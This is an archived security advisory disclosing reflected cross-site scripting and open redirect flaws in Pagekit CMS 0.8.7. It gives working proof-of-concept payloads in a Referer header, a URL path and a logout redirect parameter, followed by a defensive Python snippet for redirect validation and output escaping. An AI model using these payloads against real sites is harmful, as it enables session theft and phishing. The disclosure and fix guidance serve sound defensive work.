Pagekit 0.8.7 Cross Site Scripting / Open Redirect

2014.10.14
Credit: Mahendra
Risk: Medium
Local: No
Remote: Yes

# Exploit Title: Pagekit 0.8.7 Multiple Vulnerabilities
# Date: 13-10-2014
# Remote: Yes
# Exploit Author: Mahendra
# Vendor Homepage: http://www.pagekit.com/
# Version: 0.8.7
# Tested on: Windows XP SP 3 with WAMP Server 2.4

The latest Pagekit (0.8.7) CMS was found to be vulnerable to multiple reflected cross-site scripting issues because the application did not properly validate user input.

Pagekit is a modular and lightweight CMS built from the ground up with modern technologies like Symfony components and Doctrine. It will have a built-in marketplace to provide a platform for theme and extension developers. Pagekit will be MIT licensed and hosted on GitHub.

-------------------------------------------------------------------
Reflected cross-site scripting (CVE-2014-8069)
-------------------------------------------------------------------

Referer HTTP Header
--------------------

GET /pagekit-0.8.7/index.php/user HTTP/1.1
Host: localhost
Referer: <ScRiPt>alert(document.cookie)</ScRiPt>
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: pagekit_session=unl3outg9eufv7fs7juq1ui1m6
Connection: keep-alive
Cache-Control: max-age=0

Arbitrary URL
--------------------

The application encodes the URL entered by the user below. However, this can easily be bypassed by using a proxy to modify the URL back to its original state.

http://localhost/pagekit-0.8.7/index.php/1<ScRiPt>alert(document.cookie)</ScRiPt>

-------------------------------------------------------------------
Open redirection (CVE-2014-8070)
-------------------------------------------------------------------

http://localhost/pagekit-0.8.7/index.php/user/logout?redirect=http://www.google.com
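Both issues above share one root cause: request-controlled strings (the Referer header, the request path, the logout `redirect` parameter) reach a sink without validation or encoding. The following is an added illustration of the two server-side checks that close them, written here for this advisory and not taken from Pagekit; the function names `safe_redirect_target` and `reflect_safely` are hypothetical.

```python
from html import escape
from urllib.parse import unquote, urlsplit


def safe_redirect_target(value, default="/"):
    """Return `value` only if it is a same-site, path-only target; else `default`.

    Rejects the shapes that turn a post-logout redirect into an open redirect:
    absolute URLs (http://...), scheme-only URLs (javascript:), protocol-relative
    '//host' and the '/\\host' variant browsers treat as a new authority, plus
    percent-encoded versions of the same and control characters.
    """
    if not value:
        return default
    candidate = unquote(value).strip()
    # Control characters have no place in a Location target.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in candidate):
        return default
    parts = urlsplit(candidate)
    # Any scheme or host component means the target leaves this site.
    if parts.scheme or parts.netloc:
        return default
    # Only absolute local paths; '//' and '/\' are authority prefixes, not paths.
    if not candidate.startswith("/") or candidate.startswith(("//", "/\\")):
        return default
    return candidate


def reflect_safely(untrusted):
    """HTML-escape a request-derived string (Referer, path segment) before it is
    written into the page body, so '<ScRiPt>' renders as text, not markup."""
    return escape(untrusted, quote=True)


if __name__ == "__main__":
    # Constructed inputs mirroring the advisory's requests.
    print(safe_redirect_target("http://www.google.com"))  # -> /
    print(safe_redirect_target("/user/profile?tab=2"))    # -> /user/profile?tab=2
    print(reflect_safely("<ScRiPt>alert(document.cookie)</ScRiPt>"))
```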


Copyright 2024, cxsecurity.com